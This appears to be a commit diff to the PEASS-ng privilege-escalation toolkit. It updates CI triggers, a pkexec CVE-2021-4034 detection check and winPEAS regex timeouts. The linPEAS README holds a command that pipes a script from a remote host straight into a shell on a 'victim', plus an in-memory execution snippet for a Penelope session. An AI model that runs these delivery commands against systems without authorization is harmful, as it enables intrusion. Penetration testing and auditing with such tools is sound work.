Update CI-master_tests.yml

Update 1_system_information.sh

.github/workflows/CI-master_tests.yml

@@ -1,10 +1,6 @@
 name: CI-master_test
 
-on:
+on:  
-  pull_request:
-    branches:
-      - master
-  
   schedule:
     - cron: "5 4 * * SUN"
 

linPEAS/README.md

@@ -22,7 +22,7 @@ curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas
 
 ```bash
 # Local network
-sudo python -m SimpleHTTPServer 80 #Host
+sudo python -m http.server 80 #Host
 curl 10.10.10.10/linpeas.sh | sh #Victim
 
 # Without curl
@@ -47,6 +47,12 @@ chmod +x linpeas_linux_amd64
 ./linpeas_linux_amd64
 ```
 
+```bash
+# Execute from memory in Penelope session
+# From: https://github.com/brightio/penelope
+> run peass-ng
+```
+
 ## Firmware Analysis
 If you have a **firmware** and you want to **analyze it with linpeas** to **search for passwords or bad configured permissions** you have 2 main options.
 

linPEAS/builder/linpeas_parts/1_system_information.sh

@@ -25,7 +25,7 @@ echo ""
 print_2title "CVEs Check"
 
 #-- SY) CVE-2021-4034
-if [ `command -v pkexec` ] && stat -c '%a' $(which pkexec) | grep -q 4755 && [ "$(stat -c '%Y' $(which pkexec))" -lt "1642035600" ]; then 
+if [ `command -v pkexec` ] && stat -c '%a' $(which pkexec) | grep -q 4755 && [ "$(stat -c '%Y' $(which pkexec))" -lt "1641942000" ]; then 
     echo "Vulnerable to CVE-2021-4034" | sed -${E} "s,.*,${SED_RED_YELLOW},"
     echo ""
 fi

parsers/README.md

@@ -3,7 +3,7 @@
 These scripts allows you to transform the output of linpeas/macpeas/winpeas to JSON and then to PDF and HTML.
 
 ```python3
-python3 peass2json.py </path/to/executed_peass.out> </path/to/peass.json>
+python3 peas2json.py </path/to/executed_peass.out> </path/to/peass.json>
 python3 json2pdf.py </path/to/peass.json> </path/to/peass.pdf>
 python3 json2html.py </path/to/peass.json> </path/to/peass.html>
 ```

winPEAS/winPEASexe/winPEAS/App.config

@@ -3,4 +3,7 @@
     <startup useLegacyV2RuntimeActivationPolicy="true"> 
         
     <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5.2"/></startup>
+    <runtime>
+		<AppContextSwitchOverrides value="Switch.System.IO.UseLegacyPathHandling=false" />
+	</runtime>
 </configuration>

winPEAS/winPEASexe/winPEAS/Checks/FileAnalysis.cs

@@ -154,15 +154,39 @@ namespace winPEAS.Checks
             try
             {
                 Regex rgx;
-                if (caseinsensitive)
+                bool is_re_match = false;
-                    rgx = new Regex(regex_str.Trim(), RegexOptions.IgnoreCase);
+                try
-                else
+                {
-                    rgx = new Regex(regex_str.Trim());
+                    // Use "IsMatch" because it supports timeout, if exception is thrown exit the func to avoid ReDoS in "rgx.Matches"
+                    if (caseinsensitive)
+                    {
+                        is_re_match = Regex.IsMatch(text, regex_str.Trim(), RegexOptions.IgnoreCase, TimeSpan.FromSeconds(120));
+                        rgx = new Regex(regex_str.Trim(), RegexOptions.IgnoreCase);
+                    }
+                    else
+                    {
+                        is_re_match = Regex.IsMatch(text, regex_str.Trim(), RegexOptions.None, TimeSpan.FromSeconds(120));
+                        rgx = new Regex(regex_str.Trim());
+                    }
+                }
+                catch (RegexMatchTimeoutException e)
+                {
+                    if (Checks.IsDebug)
+                    {
+                        Beaprint.GrayPrint($"The regex {regex_str} had a timeout (ReDoS avoided but regex unchecked in a file)");
+                    }
+                    return foundMatches;
+                }
+                
+                if (!is_re_match)
+                {
+                    return foundMatches;
+                }
 
                 int cont = 0;
                 foreach (Match match in rgx.Matches(text))
                 {
-                    if (cont > 4) break;
+                    if (cont > 10) break;
                     
                     if (match.Value.Length < 400 && match.Value.Trim().Length > 2)
                         foundMatches.Add(match.Value);
@@ -349,7 +373,7 @@ namespace winPEAS.Checks
                                         timer.Stop();
 
                                         TimeSpan timeTaken = timer.Elapsed;
-                                        if (timeTaken.TotalMilliseconds > 1000)
+                                        if (timeTaken.TotalMilliseconds > 20000)
                                             Beaprint.PrintDebugLine($"\nThe regex {regex.regex} took {timeTaken.TotalMilliseconds}s in {f.FullPath}");
                                     }
                                 }